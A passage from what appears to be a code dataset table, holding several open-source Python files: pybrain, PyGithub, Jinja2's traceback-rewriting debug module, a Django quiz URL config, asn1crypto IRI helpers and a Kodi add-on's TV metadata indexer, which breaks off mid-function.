repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
chugunovyar/factoryForBuild | env/lib/python2.7/site-packages/pybrain/structure/networks/custom/convboard.py | 4 | 2775 | from pybrain.structure.modules.linearlayer import LinearLayer
from pybrain.structure.moduleslice import ModuleSlice
from pybrain.structure.connections.identity import IdentityConnection
from pybrain.structure.networks.feedforward import FeedForwardNetwork
from pybrain.structure.connections.shared import MotherConnection, SharedFullConnection
from pybrain.structure.modules.biasunit import BiasUnit
from pybrain.utilities import crossproduct
from pybrain.structure.networks.convolutional import SimpleConvolutionalNetwork
__author__ = 'Tom Schaul, tom@idsia.ch'
class ConvolutionalBoardNetwork(SimpleConvolutionalNetwork):
    """ A type of convolutional network, designed for handling game boards.
    It pads the borders with a uniform bias input to allow one output per board position.
    """

    def __init__(self, boardSize, convSize, numFeatureMaps, **args):
        # Two input channels per board position.
        inputdim = 2
        # NOTE: deliberately bypasses SimpleConvolutionalNetwork.__init__ and
        # calls the grandparent constructor; the convolutional stack is built
        # manually at the end via _buildStructure().
        FeedForwardNetwork.__init__(self, **args)
        inlayer = LinearLayer(inputdim*boardSize*boardSize, name = 'in')
        self.addInputModule(inlayer)
        # we need some treatment of the border too - thus we pad the direct board input.
        # Python 2 integer division: x is the half-width of the convolution window.
        x = convSize/2
        insize = boardSize+2*x
        if convSize % 2 == 0:
            insize -= 1
        paddedlayer = LinearLayer(inputdim*insize*insize, name = 'pad')
        self.addModule(paddedlayer)
        # we connect a bias to the padded-parts (with shared but trainable weights).
        bias = BiasUnit()
        self.addModule(bias)
        # One shared (trainable) weight per input channel, reused for every border cell.
        biasConn = MotherConnection(inputdim)
        paddable = []
        # Column indices of the left/right padding strips.
        # (Python 2: range() returns lists, so '+' concatenates them.)
        if convSize % 2 == 0:
            xs = range(x)+range(insize-x+1, insize)
        else:
            xs = range(x)+range(insize-x, insize)
        # All (row, col) positions in the padding frame: full-height side strips
        # plus the top/bottom strips spanning the board columns.
        paddable.extend(crossproduct([range(insize), xs]))
        paddable.extend(crossproduct([xs, range(x, boardSize+x)]))
        for (i, j) in paddable:
            # Feed the shared bias into the slice of 'pad' for this border cell.
            self.addConnection(SharedFullConnection(biasConn, bias, paddedlayer,
                                                    outSliceFrom = (i*insize+j)*inputdim,
                                                    outSliceTo = (i*insize+j+1)*inputdim))
        # Copy each board row unchanged into the interior of the padded layer.
        for i in range(boardSize):
            inmod = ModuleSlice(inlayer, outSliceFrom = i*boardSize*inputdim,
                                outSliceTo = (i+1)*boardSize*inputdim)
            outmod = ModuleSlice(paddedlayer, inSliceFrom = ((i+x)*insize+x)*inputdim,
                                 inSliceTo = ((i+x)*insize+x+boardSize)*inputdim)
            self.addConnection(IdentityConnection(inmod, outmod))
        # Build the shared-weight convolutional structure on top of the padded input.
        self._buildStructure(inputdim, insize, paddedlayer, convSize, numFeatureMaps)
        self.sortModules()
| gpl-3.0 |
dannyboi104/SickRage | lib/github/GitTag.py | 74 | 4322 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.GitAuthor
import github.GitObject
class GitTag(github.GithubObject.CompletableGithubObject):
    """
    This class represents GitTags as returned for example by http://developer.github.com/v3/todo
    """

    @property
    def message(self):
        """
        :type: string
        """
        # Lazily fetch the full object if this attribute was not in the
        # original API payload.
        self._completeIfNotSet(self._message)
        return self._message.value

    @property
    def object(self):
        """
        :type: :class:`github.GitObject.GitObject`
        """
        self._completeIfNotSet(self._object)
        return self._object.value

    @property
    def sha(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._sha)
        return self._sha.value

    @property
    def tag(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._tag)
        return self._tag.value

    @property
    def tagger(self):
        """
        :type: :class:`github.GitAuthor.GitAuthor`
        """
        self._completeIfNotSet(self._tagger)
        return self._tagger.value

    @property
    def url(self):
        """
        :type: string
        """
        self._completeIfNotSet(self._url)
        return self._url.value

    def _initAttributes(self):
        # Every attribute starts out lazily unresolved; the properties above
        # trigger completion on first access.
        for name in ('_message', '_object', '_sha', '_tag', '_tagger', '_url'):
            setattr(self, name, github.GithubObject.NotSet)

    def _useAttributes(self, attributes):
        # Populate only the attributes present in the API payload.
        if "message" in attributes:  # pragma no branch
            self._message = self._makeStringAttribute(attributes["message"])
        if "object" in attributes:  # pragma no branch
            self._object = self._makeClassAttribute(github.GitObject.GitObject, attributes["object"])
        if "sha" in attributes:  # pragma no branch
            self._sha = self._makeStringAttribute(attributes["sha"])
        if "tag" in attributes:  # pragma no branch
            self._tag = self._makeStringAttribute(attributes["tag"])
        if "tagger" in attributes:  # pragma no branch
            self._tagger = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["tagger"])
        if "url" in attributes:  # pragma no branch
            self._url = self._makeStringAttribute(attributes["url"])
| gpl-3.0 |
joeythesaint/yocto-autobuilder | lib/python2.7/site-packages/Jinja2-2.6-py2.7.egg/jinja2/debug.py | 112 | 11028 | # -*- coding: utf-8 -*-
"""
jinja2.debug
~~~~~~~~~~~~
Implements the debug interface for Jinja. This module does some pretty
ugly stuff with the Python traceback system in order to achieve tracebacks
with correct line numbers, locals and contents.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import sys
import traceback
from types import TracebackType
from jinja2.utils import CodeType, missing, internal_code
from jinja2.exceptions import TemplateSyntaxError
# on pypy we can take advantage of transparent proxies
try:
    from __pypy__ import tproxy
except ImportError:
    tproxy = None


# how does the raise helper look like?
# Feature-detect the raise syntax at import time: on Python 2 the exec
# succeeds and raises TypeError (three-arg raise is valid); on Python 3
# the Python 2 statement form is a SyntaxError.
try:
    exec "raise TypeError, 'foo'"
except SyntaxError:
    raise_helper = 'raise __jinja_exception__[1]'
except TypeError:
    raise_helper = 'raise __jinja_exception__[0], __jinja_exception__[1]'
class TracebackFrameProxy(object):
    """Proxies a traceback frame."""

    def __init__(self, tb):
        # tb: the real traceback object being wrapped.
        self.tb = tb
        self._tb_next = None

    @property
    def tb_next(self):
        # Logical next frame as tracked by the proxy chain.
        return self._tb_next

    def set_next(self, next):
        # Patch the underlying traceback's real tb_next (when a C-level
        # helper is available) and always record the logical link locally.
        if tb_set_next is not None:
            try:
                tb_set_next(self.tb, next and next.tb or None)
            except Exception:
                # this function can fail due to all the hackery it does
                # on various python implementations. We just catch errors
                # down and ignore them if necessary.
                pass
        self._tb_next = next

    @property
    def is_jinja_frame(self):
        # A frame belongs to compiled Jinja template code iff the template
        # marker global is present in its globals.
        return '__jinja_template__' in self.tb.tb_frame.f_globals

    def __getattr__(self, name):
        # Delegate everything else (tb_frame, tb_lineno, ...) to the real tb.
        return getattr(self.tb, name)
def make_frame_proxy(frame):
    """Wrap a traceback in a :class:`TracebackFrameProxy`.

    On pypy (when ``tproxy`` is available) the proxy is additionally wrapped
    in a transparent proxy so it is indistinguishable from a real traceback.
    """
    proxy = TracebackFrameProxy(frame)
    if tproxy is None:
        return proxy

    def operation_handler(operation, *args, **kwargs):
        # Route all attribute access and method calls performed on the
        # transparent proxy to the TracebackFrameProxy instance.
        if operation in ('__getattribute__', '__getattr__'):
            return getattr(proxy, args[0])
        elif operation == '__setattr__':
            proxy.__setattr__(*args, **kwargs)
        else:
            return getattr(proxy, operation)(*args, **kwargs)
    return tproxy(TracebackType, operation_handler)
class ProcessedTraceback(object):
    """Holds a Jinja preprocessed traceback for printing or reraising."""

    def __init__(self, exc_type, exc_value, frames):
        # frames: non-empty list of frame proxies (see make_frame_proxy).
        assert frames, 'no frames for this traceback?'
        self.exc_type = exc_type
        self.exc_value = exc_value
        self.frames = frames

        # newly concatenate the frames (which are proxies)
        prev_tb = None
        for tb in self.frames:
            if prev_tb is not None:
                prev_tb.set_next(tb)
            prev_tb = tb
        prev_tb.set_next(None)

    def render_as_text(self, limit=None):
        """Return a string with the traceback."""
        lines = traceback.format_exception(self.exc_type, self.exc_value,
                                           self.frames[0], limit=limit)
        return ''.join(lines).rstrip()

    def render_as_html(self, full=False):
        """Return a unicode string with the traceback as rendered HTML."""
        # Imported lazily to avoid a hard dependency when HTML rendering
        # is never used.
        from jinja2.debugrenderer import render_traceback
        return u'%s\n\n<!--\n%s\n-->' % (
            render_traceback(self, full=full),
            self.render_as_text().decode('utf-8', 'replace')
        )

    @property
    def is_template_syntax_error(self):
        """`True` if this is a template syntax error."""
        return isinstance(self.exc_value, TemplateSyntaxError)

    @property
    def exc_info(self):
        """Exception info tuple with a proxy around the frame objects."""
        return self.exc_type, self.exc_value, self.frames[0]

    @property
    def standard_exc_info(self):
        """Standard python exc_info for re-raising"""
        tb = self.frames[0]
        # the frame will be an actual traceback (or transparent proxy) if
        # we are on pypy or a python implementation with support for tproxy
        if type(tb) is not TracebackType:
            tb = tb.tb
        return self.exc_type, self.exc_value, tb
def make_traceback(exc_info, source_hint=None):
    """Creates a processed traceback object from the exc_info."""
    exc_type, exc_value, tb = exc_info
    # Template syntax errors carry their own template location, so the
    # exc_info is rewritten first and no internal frame needs skipping.
    if isinstance(exc_value, TemplateSyntaxError):
        return translate_exception(translate_syntax_error(exc_value, source_hint), 0)
    # Otherwise skip the one internal frame that raised on our behalf.
    return translate_exception(exc_info, 1)
def translate_syntax_error(error, source=None):
    """Rewrites a syntax error to please traceback systems."""
    # Attach the template source and mark the error as already translated.
    error.source = source
    error.translated = True
    filename = error.filename
    if filename is None:
        filename = '<unknown>'
    # Fabricate a synthetic frame that points at the offending template line.
    return fake_exc_info((error.__class__, error, None), filename, error.lineno)
def translate_exception(exc_info, initial_skip=0):
    """If passed an exc_info it will automatically rewrite the exceptions
    all the way down to the correct line numbers and frames.
    """
    tb = exc_info[2]
    frames = []

    # skip some internal frames if wanted
    for x in xrange(initial_skip):
        if tb is not None:
            tb = tb.tb_next
    initial_tb = tb

    while tb is not None:
        # skip frames decorated with @internalcode. These are internal
        # calls we can't avoid and that are useless in template debugging
        # output.
        if tb.tb_frame.f_code in internal_code:
            tb = tb.tb_next
            continue

        # save a reference to the next frame if we override the current
        # one with a faked one.
        next = tb.tb_next

        # fake template exceptions
        template = tb.tb_frame.f_globals.get('__jinja_template__')
        if template is not None:
            # Map the compiled-code line number back to the template source
            # line and substitute a synthetic frame pointing at the template.
            lineno = template.get_corresponding_lineno(tb.tb_lineno)
            tb = fake_exc_info(exc_info[:2] + (tb,), template.filename,
                               lineno)[2]
        frames.append(make_frame_proxy(tb))
        tb = next

    # if we don't have any exceptions in the frames left, we have to
    # reraise it unchanged.
    # XXX: can we backup here? when could this happen?
    if not frames:
        # Python 2 three-argument raise: re-raise with the original traceback.
        raise exc_info[0], exc_info[1], exc_info[2]

    return ProcessedTraceback(exc_info[0], exc_info[1], frames)
def fake_exc_info(exc_info, filename, lineno):
    """Helper for `translate_exception`.

    Re-raises the exception from a synthetic code object so the resulting
    traceback frame reports *filename*/*lineno* (the template location) and
    carries the template's locals.
    """
    exc_type, exc_value, tb = exc_info

    # figure the real context out
    if tb is not None:
        real_locals = tb.tb_frame.f_locals.copy()
        ctx = real_locals.get('context')
        if ctx:
            # Expose the template context's variables as frame locals.
            locals = ctx.get_all()
        else:
            locals = {}
        for name, value in real_locals.iteritems():
            # Compiled templates prefix template variables with 'l_'.
            if name.startswith('l_') and value is not missing:
                locals[name[2:]] = value

        # if there is a local called __jinja_exception__, we get
        # rid of it to not break the debug functionality.
        locals.pop('__jinja_exception__', None)
    else:
        locals = {}

    # assemble fake globals we need
    globals = {
        '__name__': filename,
        '__file__': filename,
        '__jinja_exception__': exc_info[:2],

        # we don't want to keep the reference to the template around
        # to not cause circular dependencies, but we mark it as Jinja
        # frame for the ProcessedTraceback
        '__jinja_template__': None
    }

    # and fake the exception
    # Padding with newlines makes the re-raise appear at `lineno` in `filename`.
    code = compile('\n' * (lineno - 1) + raise_helper, filename, 'exec')

    # if it's possible, change the name of the code. This won't work
    # on some python environments such as google appengine
    try:
        if tb is None:
            location = 'template'
        else:
            function = tb.tb_frame.f_code.co_name
            if function == 'root':
                location = 'top-level template code'
            elif function.startswith('block_'):
                location = 'block "%s"' % function[6:]
            else:
                location = 'template'
        # Rebuild the code object with `location` as its co_name so the
        # traceback line reads e.g. 'in block "title"'.
        code = CodeType(0, code.co_nlocals, code.co_stacksize,
                        code.co_flags, code.co_code, code.co_consts,
                        code.co_names, code.co_varnames, filename,
                        location, code.co_firstlineno,
                        code.co_lnotab, (), ())
    except:
        pass

    # execute the code and catch the new traceback
    try:
        exec code in globals, locals
    except:
        exc_info = sys.exc_info()
        new_tb = exc_info[2].tb_next

    # return without this frame
    return exc_info[:2] + (new_tb,)
def _init_ugly_crap():
    """This function implements a few ugly things so that we can patch the
    traceback objects. The function returned allows resetting `tb_next` on
    any python traceback object. Do not attempt to use this on non cpython
    interpreters
    """
    import ctypes
    from types import TracebackType

    # figure out size of _Py_ssize_t
    # The Py_InitModule4 symbol carries a _64 suffix on 64-bit CPython builds.
    if hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
        _Py_ssize_t = ctypes.c_int64
    else:
        _Py_ssize_t = ctypes.c_int

    # regular python
    # Mirror of CPython's PyObject header: refcount + type pointer.
    class _PyObject(ctypes.Structure):
        pass
    _PyObject._fields_ = [
        ('ob_refcnt', _Py_ssize_t),
        ('ob_type', ctypes.POINTER(_PyObject))
    ]

    # python with trace
    # Debug (--with-pydebug) builds prepend the _ob_next/_ob_prev linked-list
    # pointers to every object header; sys.getobjects exists only there.
    if hasattr(sys, 'getobjects'):
        class _PyObject(ctypes.Structure):
            pass
        _PyObject._fields_ = [
            ('_ob_next', ctypes.POINTER(_PyObject)),
            ('_ob_prev', ctypes.POINTER(_PyObject)),
            ('ob_refcnt', _Py_ssize_t),
            ('ob_type', ctypes.POINTER(_PyObject))
        ]

    # Mirror of CPython's PyTracebackObject layout.
    class _Traceback(_PyObject):
        pass
    _Traceback._fields_ = [
        ('tb_next', ctypes.POINTER(_Traceback)),
        ('tb_frame', ctypes.POINTER(_PyObject)),
        ('tb_lasti', ctypes.c_int),
        ('tb_lineno', ctypes.c_int)
    ]

    def tb_set_next(tb, next):
        """Set the tb_next attribute of a traceback object."""
        if not (isinstance(tb, TracebackType) and
                (next is None or isinstance(next, TracebackType))):
            raise TypeError('tb_set_next arguments must be traceback objects')
        obj = _Traceback.from_address(id(tb))
        # We write to the struct directly, bypassing the interpreter, so
        # reference counts have to be adjusted by hand.
        if tb.tb_next is not None:
            old = _Traceback.from_address(id(tb.tb_next))
            old.ob_refcnt -= 1
        if next is None:
            obj.tb_next = ctypes.POINTER(_Traceback)()
        else:
            next = _Traceback.from_address(id(next))
            next.ob_refcnt += 1
            obj.tb_next = ctypes.pointer(next)

    return tb_set_next
# try to get a tb_set_next implementation if we don't have transparent
# proxies.
# Preference order: C extension helper, then the ctypes hack; on failure
# (or on pypy, where tproxy makes it unnecessary) tb_set_next stays None
# and TracebackFrameProxy only tracks the chain logically.
tb_set_next = None
if tproxy is None:
    try:
        from jinja2._debugsupport import tb_set_next
    except ImportError:
        try:
            tb_set_next = _init_ugly_crap()
        except:
            pass
del _init_ugly_crap
| gpl-2.0 |
amragaey/AndroidWEB | quizes/urls.py | 1 | 1126 | from django.conf.urls import url
from quizes import views
urlpatterns = [
    # Quiz list / create / detail endpoints.
    url(r'^quizes/?$', views.viewQuizes.as_view()),
    url(r'^quizes/create/?$', views.createQuiz.as_view()),
    url(r'^quizes/(?P<pk>\d+)/?$', views.singleQuiz.as_view()),
    # Question and choice endpoints are currently disabled.
    # url(r'^questions/?$', views.viewQuestions.as_view()),
    # url(r'^questions/create/?$', views.createQuestion.as_view()),
    # url(r'^questions/(?P<pk>\d+)/?$', views.singleQuestion.as_view()),
    # url(r'^choices/?$', views.viewChoices.as_view()),
    # url(r'^choices/create/?$', views.createChoice.as_view()),
    # url(r'^choices/(?P<pk>\d+)/?$', views.singleChoice.as_view()),
    # Quiz attempt list / create / detail endpoints.
    url(r'^QuizAttempts/?$', views.viewAttempts.as_view()),
    url(r'^QuizAttempts/create/?$', views.createAttempt.as_view()),
    url(r'^QuizAttempts/(?P<pk>\d+)/?$', views.singleAttempt.as_view()),
    # Answer list / create / detail endpoints.
    url(r'^Answers/?$', views.viewAnswers.as_view()),
    url(r'^Answers/create/?$', views.createAnswer.as_view()),
    url(r'^Answers/(?P<pk>\d+)/?$', views.singleAnswer.as_view()),
    # url(r'^quizes/Attempts/(?P<pk>\d+)/questinsAttempts/create/?$', views.createQattempts.as_view()),
]
repotvsupertuga/repo | instal/plugin.video.SportsDevil/service/asn1crypto/_iri.py | 27 | 8628 | # coding: utf-8
"""
Functions to convert unicode IRIs into ASCII byte string URIs and back. Exports
the following items:
- iri_to_uri()
- uri_to_iri()
"""
from __future__ import unicode_literals, division, absolute_import, print_function
from encodings import idna # noqa
import codecs
import re
import sys
from ._errors import unwrap
from ._types import byte_cls, str_cls, type_name, bytes_to_list, int_types
if sys.version_info < (3,):
from urlparse import urlsplit, urlunsplit
from urllib import (
quote as urlquote,
unquote as unquote_to_bytes,
)
else:
from urllib.parse import (
quote as urlquote,
unquote_to_bytes,
urlsplit,
urlunsplit,
)
def iri_to_uri(value):
    """
    Normalizes and encodes a unicode IRI into an ASCII byte string URI

    :param value:
        A unicode string of an IRI

    :return:
        A byte string of the ASCII-encoded URI
    """

    if not isinstance(value, str_cls):
        raise TypeError(unwrap(
            '''
            value must be a unicode string, not %s
            ''',
            type_name(value)
        ))

    scheme = None
    # Python 2.6 doesn't split properly is the URL doesn't start with http:// or https://
    if sys.version_info < (2, 7) and not value.startswith('http://') and not value.startswith('https://'):
        # Temporarily substitute a scheme urlsplit() understands, then restore
        # the real prefix after parsing.
        real_prefix = None
        prefix_match = re.match('^[^:]*://', value)
        if prefix_match:
            real_prefix = prefix_match.group(0)
            value = 'http://' + value[len(real_prefix):]
        parsed = urlsplit(value)
        if real_prefix:
            value = real_prefix + value[7:]
            scheme = _urlquote(real_prefix[:-3])
    else:
        parsed = urlsplit(value)

    if scheme is None:
        scheme = _urlquote(parsed.scheme)
    hostname = parsed.hostname
    if hostname is not None:
        # IDNA-encode international hostnames to ASCII (punycode).
        hostname = hostname.encode('idna')

    # RFC 3986 allows userinfo to contain sub-delims
    username = _urlquote(parsed.username, safe='!$&\'()*+,;=')
    password = _urlquote(parsed.password, safe='!$&\'()*+,;=')
    port = parsed.port
    if port is not None:
        port = str_cls(port).encode('ascii')

    # Reassemble the netloc from the individually quoted components.
    netloc = b''
    if username is not None:
        netloc += username
        if password:
            netloc += b':' + password
        netloc += b'@'
    if hostname is not None:
        netloc += hostname
    if port is not None:
        # Omit the port when it is the default for the scheme.
        default_http = scheme == b'http' and port == b'80'
        default_https = scheme == b'https' and port == b'443'
        if not default_http and not default_https:
            netloc += b':' + port

    # RFC 3986 allows a path to contain sub-delims, plus "@" and ":"
    path = _urlquote(parsed.path, safe='/!$&\'()*+,;=@:')

    # RFC 3986 allows the query to contain sub-delims, plus "@", ":" , "/" and "?"
    query = _urlquote(parsed.query, safe='/?!$&\'()*+,;=@:')

    # RFC 3986 allows the fragment to contain sub-delims, plus "@", ":" , "/" and "?"
    fragment = _urlquote(parsed.fragment, safe='/?!$&\'()*+,;=@:')

    # Normalize a bare trailing slash away when there is nothing after it.
    if query is None and fragment is None and path == b'/':
        path = None

    # Python 2.7 compat
    if path is None:
        path = ''

    output = urlunsplit((scheme, netloc, path, query, fragment))
    if isinstance(output, str_cls):
        output = output.encode('latin1')
    return output
def uri_to_iri(value):
    """
    Converts an ASCII URI byte string into a unicode IRI

    :param value:
        An ASCII-encoded byte string of the URI

    :return:
        A unicode string of the IRI
    """

    if not isinstance(value, byte_cls):
        raise TypeError(unwrap(
            '''
            value must be a byte string, not %s
            ''',
            type_name(value)
        ))

    parsed = urlsplit(value)

    scheme = parsed.scheme
    if scheme is not None:
        scheme = scheme.decode('ascii')

    # Keep ":" and "@" percent-encoded in userinfo so the netloc structure
    # is not altered by unquoting.
    username = _urlunquote(parsed.username, remap=[':', '@'])
    password = _urlunquote(parsed.password, remap=[':', '@'])
    hostname = parsed.hostname
    if hostname:
        # Decode punycode hostnames back to unicode.
        hostname = hostname.decode('idna')
    port = parsed.port
    if port and not isinstance(port, int_types):
        port = port.decode('ascii')

    # Rebuild the netloc from the decoded pieces.
    netloc = ''
    if username is not None:
        netloc += username
        if password:
            netloc += ':' + password
        netloc += '@'
    if hostname is not None:
        netloc += hostname
    if port is not None:
        netloc += ':' + str_cls(port)

    # Structural delimiters ("/" in paths, "&"/"=" in queries) that were
    # percent-encoded stay encoded; literal occurrences are preserved.
    path = _urlunquote(parsed.path, remap=['/'], preserve=True)
    query = _urlunquote(parsed.query, remap=['&', '='], preserve=True)
    fragment = _urlunquote(parsed.fragment)

    return urlunsplit((scheme, netloc, path, query, fragment))
def _iri_utf8_errors_handler(exc):
    """
    Error handler for decoding UTF-8 parts of a URI into an IRI. Leaves byte
    sequences encoded in %XX format, but as part of a unicode string.

    :param exc:
        The UnicodeDecodeError exception

    :return:
        A 2-element tuple of (replacement unicode string, integer index to
        resume at)
    """

    # Re-encode each undecodable byte as a literal percent escape and
    # resume decoding immediately after the bad span.
    bad_span = exc.object[exc.start:exc.end]
    replacement = ''.join('%%%02x' % num for num in bytes_to_list(bad_span))
    return (replacement, exc.end)


codecs.register_error('iriutf8', _iri_utf8_errors_handler)
def _urlquote(string, safe=''):
    """
    Quotes a unicode string for use in a URL

    :param string:
        A unicode string

    :param safe:
        A unicode string of character to not encode

    :return:
        None (if string is None) or an ASCII byte string of the quoted string
    """

    if string is None or string == '':
        return None

    # Anything already hex quoted is pulled out of the URL and unquoted if
    # possible
    escapes = []
    if re.search('%[0-9a-fA-F]{2}', string):
        # Try to unquote any percent values, restoring them if they are not
        # valid UTF-8. Also, requote any safe chars since encoded versions of
        # those are functionally different than the unquoted ones.
        def _try_unescape(match):
            byte_string = unquote_to_bytes(match.group(0))
            # The 'iriutf8' handler keeps undecodable bytes as %XX text.
            unicode_string = byte_string.decode('utf-8', 'iriutf8')
            for safe_char in list(safe):
                unicode_string = unicode_string.replace(safe_char, '%%%02x' % ord(safe_char))
            return unicode_string
        string = re.sub('(?:%[0-9a-fA-F]{2})+', _try_unescape, string)

        # Once we have the minimal set of hex quoted values, removed them from
        # the string so that they are not double quoted
        # (each escape is swapped for a NUL placeholder and restored below).
        def _extract_escape(match):
            escapes.append(match.group(0).encode('ascii'))
            return '\x00'
        string = re.sub('%[0-9a-fA-F]{2}', _extract_escape, string)

    output = urlquote(string.encode('utf-8'), safe=safe.encode('utf-8'))
    if not isinstance(output, byte_cls):
        output = output.encode('ascii')

    # Restore the existing quoted values that we extracted
    if len(escapes) > 0:
        def _return_escape(_):
            return escapes.pop(0)
        # urlquote() turned each '\x00' placeholder into '%00'.
        output = re.sub(b'%00', _return_escape, output)

    return output
def _urlunquote(byte_string, remap=None, preserve=None):
    """
    Unquotes a URI portion from a byte string into unicode using UTF-8

    :param byte_string:
        A byte string of the data to unquote

    :param remap:
        A list of characters (as unicode) that should be re-mapped to a
        %XX encoding. This is used when characters are not valid in part of a
        URL.

    :param preserve:
        A bool - indicates that the chars to be remapped if they occur in
        non-hex form, should be preserved. E.g. / for URL path.

    :return:
        A unicode string
    """

    if byte_string is None:
        return byte_string

    if byte_string == b'':
        return ''

    if preserve:
        # Swap literal occurrences of each remap char for an unused control
        # character placeholder so they survive the remap step below.
        replacements = ['\x1A', '\x1C', '\x1D', '\x1E', '\x1F']
        preserve_unmap = {}
        for char in remap:
            replacement = replacements.pop(0)
            preserve_unmap[replacement] = char
            byte_string = byte_string.replace(char.encode('ascii'), replacement.encode('ascii'))

    byte_string = unquote_to_bytes(byte_string)

    if remap:
        # Any remap chars that came from %XX escapes are re-encoded so they
        # remain escaped in the resulting unicode string.
        for char in remap:
            byte_string = byte_string.replace(char.encode('ascii'), ('%%%02x' % ord(char)).encode('ascii'))

    # The 'iriutf8' handler keeps undecodable bytes as %XX text instead of
    # raising UnicodeDecodeError.
    output = byte_string.decode('utf-8', 'iriutf8')

    if preserve:
        # Restore the literal chars that were protected before unquoting.
        for replacement, original in preserve_unmap.items():
            output = output.replace(replacement, original)

    return output
| gpl-2.0 |
repotvsupertuga/repo | plugin.video.loganaddon/resources/lib/indexers/episodes.py | 6 | 57686 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os,sys,re,json,zipfile,StringIO,urllib,urllib2,urlparse,base64,datetime
from resources.lib.libraries import trakt
from resources.lib.libraries import cleantitle
from resources.lib.libraries import control
from resources.lib.libraries import client
from resources.lib.libraries import cache
from resources.lib.libraries import favourites
from resources.lib.libraries import workers
from resources.lib.libraries import views
from resources.lib.libraries import playcount
class seasons:
    def __init__(self):
        # Accumulator for season metadata dictionaries.
        self.list = []
        self.tvdb_key = control.tvdb_key
        # Current time shifted back 5 hours (timezone offset heuristic) and
        # its date string, used for comparisons against air dates.
        self.datetime = (datetime.datetime.utcnow() - datetime.timedelta(hours = 5))
        self.today_date = (self.datetime).strftime('%Y-%m-%d')
        # Preferred metadata language, defaulting to English.
        self.info_lang = control.info_lang or 'en'
        # TheTVDB full-series zip dump; series id and language filled in later.
        self.tvdb_info_link = 'http://thetvdb.com/api/%s/series/%s/all/%s.zip' % (self.tvdb_key, '%s', '%s')
        # Lookup of a TheTVDB series id from an IMDB id.
        self.tvdb_by_imdb = 'http://thetvdb.com/api/GetSeriesByRemoteID.php?imdbid=%s'
        # Artwork base URLs for TMDb and TheTVDB.
        self.tmdb_image = 'http://image.tmdb.org/t/p/original'
        self.tmdb_poster = 'http://image.tmdb.org/t/p/w500'
        self.tvdb_image = 'http://thetvdb.com/banners/'
        self.tvdb_poster = 'http://thetvdb.com/banners/_cache/'
def get(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, idx=True):
if idx == True:
self.list = cache.get(self.tvdb_list, 24, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang)
self.seasonDirectory(self.list)
return self.list
else:
self.list = self.tvdb_list(tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang)
return self.list
def tvdb_list(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, lang, limit=''):
    """
    Collect season and/or episode metadata for one show into self.list.

    Missing ids are resolved first (tvdb via TVDb's imdb lookup, tmdb via
    TMDb's external-id bridge), then TMDb JSON info ('item') is merged with
    the TVDb zipped XML bundle (series xml + banners.xml).

    limit selects what is built:
      ''   -> season entries only
      '-1' -> every episode entry
      '-2' -> stop after the TMDb lookup (metadata probe, no list build)
      'N'  -> episode entries of season N only
    Returns self.list, or None if the TVDb bundle cannot be processed.
    Per-item failures are deliberately swallowed (best-effort scraper style).
    """
    # --- id resolution: fill in a missing tvdb id, first via TVDb's
    # imdb lookup, then (if still missing) via TMDb's find endpoint. ---
    try:
        if tvdb == '0' and not imdb == '0':
            url = self.tvdb_by_imdb % imdb
            result = client.request(url, timeout='10')
            try: tvdb = client.parseDOM(result, 'seriesid')[0]
            except: tvdb = '0'
            try: name = client.parseDOM(result, 'SeriesName')[0]
            except: name = '0'
            # TVDb marks merged records as '***Duplicate NNN***' in the
            # series name; follow the redirect id when present.
            dupe = re.compile('[***]Duplicate (\d*)[***]').findall(name)
            if len(dupe) > 0: tvdb = str(dupe[0])
            if tvdb == '': tvdb = '0'
            tvdb = tvdb.encode('utf-8')
        if tvdb == '0' and not imdb == '0':
            url = self.tmdb_by_imdb % imdb
            result = client.request(url, timeout='10')
            result = json.loads(result)
            tmdb = result['tv_results'][0]['id']
            if tmdb == '' or tmdb == None: tmdb = '0'
            tmdb = re.sub('[^0-9]', '', str(tmdb))
            tmdb = tmdb.encode('utf-8')
            if not tmdb == '0':
                #url = self.tmdb_info_link % (tmdb, lang)
                url = self.tmdb_info_link % (tmdb, 'en')
                item = client.request(url, timeout='10')
                item = json.loads(item)
                tvdb = item['external_ids']['tvdb_id']
                if tvdb == '' or tvdb == None: tvdb = '0'
                tvdb = re.sub('[^0-9]', '', str(tvdb))
                tvdb = tvdb.encode('utf-8')
    except:
        pass
    # --- fetch the TMDb show document ('item') unless the block above
    # already produced one; a '-2' caller only wants this lookup. ---
    try:
        # probes whether 'item' was bound above (NameError -> not bound)
        try: item = item
        except: item = ''
        if limit == '-2' or not item == '': raise Exception()
        if tmdb == '0' and not imdb == '0':
